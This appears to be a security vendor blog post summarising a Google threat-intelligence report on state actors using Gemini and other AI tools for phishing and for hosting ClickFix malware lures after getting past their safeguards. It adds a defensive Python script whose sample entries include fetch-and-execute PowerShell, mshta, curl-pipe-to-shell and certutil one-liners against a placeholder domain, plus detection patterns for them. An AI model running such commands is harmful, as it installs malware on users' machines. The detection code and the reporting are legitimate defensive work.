Researchers at Google’s Threat Intelligence Group (GTIG) warn that nation-state threat actors have adopted Gemini and other AI tools as essential components of their operations. The threat actors use these tools to conduct research and reconnaissance, target victims, and rapidly create phishing lures.
“Increasingly, threat actors now leverage LLMs to generate hyper-personalized, culturally nuanced lures that can mirror the professional tone of a target organization or local language,” the researchers write.
“This capability extends beyond simple email generation into ‘rapport-building phishing,’ where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those "tells" and improve the effectiveness of their social engineering efforts.”
Threat actors also abused a wide range of AI tools to host malicious commands for ClickFix social engineering attacks. The attackers bypassed safety guardrails used by ChatGPT, Copilot, DeepSeek, Gemini, Grok, and others.
“While not a new malware technique, GTIG observed instances in which threat actors abused the public's trust in generative AI services to attempt to deliver malware,” the researchers write. “GTIG identified a novel campaign where threat actors are leveraging the public sharing feature of generative AI services, including Gemini, to host deceptive social engineering content.”
“This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established ‘ClickFix’ technique. This ClickFix technique is used to socially engineer users to copy and paste a malicious command into the command terminal.”
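The ClickFix pattern described above leaves a trace on the endpoint: the pasted one-liner ends up in places like the Windows Run dialog history (RunMRU) or a user's shell history. The following script is an added example written for this post, not code from Google, GTIG or KnowBe4, and it uses constructed sample entries rather than anything from the report. It scores each entry on three hallmarks of a paste-to-run lure (fetches a URL, hands the result to an interpreter, hides its window or bypasses policy) so a defender reviewing exported history can triage quickly. The regular expressions are generic heuristics for that shape, not indicators taken from the campaign, and `example.invalid` is a placeholder domain.

```python
import re

# Constructed sample entries, in the form a defender might export from the
# Windows RunMRU key or a shell history file. Illustrative only; the URLs use
# the reserved .invalid TLD and are not real campaign infrastructure.
SAMPLE_ENTRIES = [
    "notepad.exe",
    'powershell -w hidden -c "iex (iwr https://example.invalid/x)"',
    "mshta https://example.invalid/verify",
    "curl -fsSL https://example.invalid/setup.sh | sh",
    "calc",
    'cmd /c "certutil -urlcache -f https://example.invalid/a.txt a.txt"',
]

# Hallmark 1: the command reaches out to a remote resource.
REMOTE_FETCH = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b|certutil.*-urlcache",
    re.I,
)
# Hallmark 2: fetched content is handed straight to an interpreter.
EXEC_SINK = re.compile(
    r"\biex\b|invoke-expression|\bmshta\b|\|\s*(sh|bash)\b|\bstart-process\b",
    re.I,
)
# Hallmark 3: the window is hidden or execution policy is bypassed, so the
# victim sees nothing after pasting.
HIDE_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-enc(odedcommand)?\b",
    re.I,
)


def score_entry(entry: str) -> int:
    """Return a suspicion score from 0 to 3 for one pasted command line."""
    score = 0
    if REMOTE_FETCH.search(entry):
        score += 1
    if EXEC_SINK.search(entry):
        score += 1
    if HIDE_FLAGS.search(entry):
        score += 1
    return score


def find_suspicious(entries, threshold=2):
    """Return (entry, score) pairs scoring at or above threshold, highest first.

    A threshold of 2 keeps plain downloads (fetch only) out of the triage
    list while still surfacing fetch-and-execute one-liners.
    """
    hits = [(e, score_entry(e)) for e in entries]
    hits = [(e, s) for e, s in hits if s >= threshold]
    return sorted(hits, key=lambda pair: pair[1], reverse=True)


if __name__ == "__main__":
    for entry, score in find_suspicious(SAMPLE_ENTRIES):
        print(f"[{score}/3] {entry}")
```

Run it against a real RunMRU export or shell history by replacing `SAMPLE_ENTRIES` with the exported lines; anything scoring 3 is almost certainly a paste-to-run lure, while a score of 2 warrants a look at the parent process and the URL involved.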
AI-powered security awareness training can give your organization an essential layer of defense against social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
Google has the story.
Here's how it works:
